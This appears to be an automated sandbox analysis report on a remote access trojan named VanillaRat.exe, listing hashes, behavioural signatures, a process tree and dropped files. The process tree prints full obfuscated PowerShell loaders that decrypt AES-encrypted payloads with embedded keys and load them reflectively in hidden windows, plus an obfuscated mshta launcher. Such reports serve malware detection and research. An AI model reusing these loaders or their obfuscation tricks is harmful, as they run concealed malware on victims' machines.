Analysis

  • max time kernel
    60s
  • max time network
    21s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    18-08-2024 13:35

General

  • Target

    Release/VanillaRat.exe

  • Size

    1.7MB

  • MD5

    59fea74c326c7e496617bb45bdfbcc00

  • SHA1

    7c0dd54592857eed1cb068e24315b2bbe7511b76

  • SHA256

    9b6dcbe8df1be5241a40987a416e896737a7442db492e9df8413277835fb766d

  • SHA512

    443005543a476b0c3ef4744ba0b7075185cf0ae80783c06f98ee2845872c54ad2ee6d69810acaed692720b5ad19129935b751e45ac8725b050ccca5b94ecc6ba

  • SSDEEP

    24576:Lz2qwZHZd2PjnRh3Xz2DrtasSA7ZUNnbkAqE6joUZ57W:f2qw+nYVZY6jog

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell and hides the display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 4 IoCs
  • Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

    Windows that would typically be displayed when an application carries out an operation can be hidden.

  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:564
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{05f2ac45-92e4-4f14-8881-ace328a0574e}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:656
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{e501f1c1-975e-43a2-8573-35497546766a}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1600
    • C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe
      "C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:1468
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" -WindowStyle Hidden -command "& {Start-Process -FilePath 'Handlers\Handler.bat' -WindowStyle Hidden -Wait}
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4640
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat" "
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4296
          • C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
            "Handler.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AsZVG($IObBH){ $nGKhQ=[System.Security.Cryptography.Aes]::Create(); $nGKhQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nGKhQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nGKhQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='); $nGKhQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg=='); $IIMfj=$nGKhQ.CreateDecryptor(); $return_var=$IIMfj.TransformFinalBlock($IObBH, 0, $IObBH.Length); $IIMfj.Dispose(); $nGKhQ.Dispose(); $return_var;}function nroxc($IObBH){ $lXPBt=New-Object System.IO.MemoryStream(,$IObBH); $jzRog=New-Object System.IO.MemoryStream; $raowK=New-Object System.IO.Compression.GZipStream($lXPBt, [IO.Compression.CompressionMode]::Decompress); $raowK.CopyTo($jzRog); $raowK.Dispose(); $lXPBt.Dispose(); $jzRog.Dispose(); $jzRog.ToArray();}function Dtllp($IObBH,$RqHgm){ $OepAU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$IObBH); $TRlDt=$OepAU.EntryPoint; $TRlDt.Invoke($null, $RqHgm);}$pyjrp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat').Split([Environment]::NewLine);foreach ($FdSgb in $pyjrp) { if ($FdSgb.StartsWith('SEROXEN')) { $AdNpy=$FdSgb.Substring(7); break; }}$tMmhK=[string[]]$AdNpy.Split('\');$vypGp=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[0])));$asijd=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[1])));Dtllp $asijd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Dtllp $vypGp (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
            4⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4588
            • C:\Windows\SysWOW64\dllhost.exe
              C:\Windows\SysWOW64\dllhost.exe /Processid:{d36bbe4c-8175-4128-847f-69464971dbfa}
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1632
            • C:\Windows\SysWOW64\dllhost.exe
              C:\Windows\SysWOW64\dllhost.exe /Processid:{28beff50-36c5-4596-8c14-43feb29a3939}
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3872
    • C:\Windows\$sxr-mshta.exe
      C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
      1⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1416
      • C:\Windows\$sxr-cmd.exe
        "C:\Windows\$sxr-cmd.exe" /c %$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1868
        • C:\Windows\$sxr-powershell.exe
          C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 
'')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] 
-join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 
'')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))
          3⤵
          • Executes dropped EXE
          • Hide Artifacts: Hidden Window
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3928

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe

      Filesize

      435KB

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_izbbwn40.3f3.ps1

      Filesize

      1B

    • C:\Windows\$sxr-cmd.exe

      Filesize

      265KB

    • C:\Windows\$sxr-mshta.exe

      Filesize

      14KB
